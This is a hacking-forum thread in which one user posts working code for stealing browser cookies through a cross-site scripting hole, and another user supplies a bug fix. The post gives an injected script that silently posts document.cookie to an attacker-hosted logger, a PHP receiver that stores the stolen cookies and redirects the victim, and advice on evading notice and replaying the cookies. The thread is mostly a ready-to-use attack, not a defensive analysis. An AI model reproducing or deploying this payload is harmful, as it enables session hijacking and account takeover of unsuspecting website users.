Exploit XSS vulnerabilities

[Hatemind]

This may be well known, but I'm going to show you how to actually steal cookies once you have found an XSS. It submits a hidden form to a PHP file you host. It could redirect to a URL with GET, but then it's more obvious that cookies where stolen by the URL if the victim checks browsing history. You could also use the javascript form submission, but I used a fake click instead.

XSS CODE:

Code: Select all

<script>document.write('<form method=post action="http://example.com/logger.php" style="display:none;"><textarea name=data>', document.cookie, '</textarea><input type=submit id="submit"/></form>');document.getElementById('submit').click();</script>

PHP CODE:

Code: Select all

<?PHP
if (isset($_REQUEST['data'])) {
    $data = $_REQUEST['data'];
    $url = "http://www.google.com/"; //URL to redirect to after stealing shit.
    $log = fopen("xsslog.html", "a+");
    fwrite($log, $data."<br>\r\n<br>\r\n");
    fclose($log);
    header("Location: ".$url);
}
?>

HTML CODE: (optional but sexy)

Code: Select all

<style>* {background: #080808; color: #009900; font-family: "Courier New", Courier, "Lucida Sans Typewriter", "Lucida Typewriter", monospace;}</style>
<h1>XSS C00KIE L0GS</h1>

You can't be a hacker without green text on a black screen and numbers in place of letters.

In order to use stolen cookies, you'll need to find a browser extension that lets you do so.

[Cool_Fire]

Minor bug in your php:
You're writing $data but you never copy $_REQUEST['data'] into $data.

[Hatemind]

Minor bug in your php:
You're writing $data but you never copy $_REQUEST['data'] into $data.

No idea how I missed that, but I fixed it.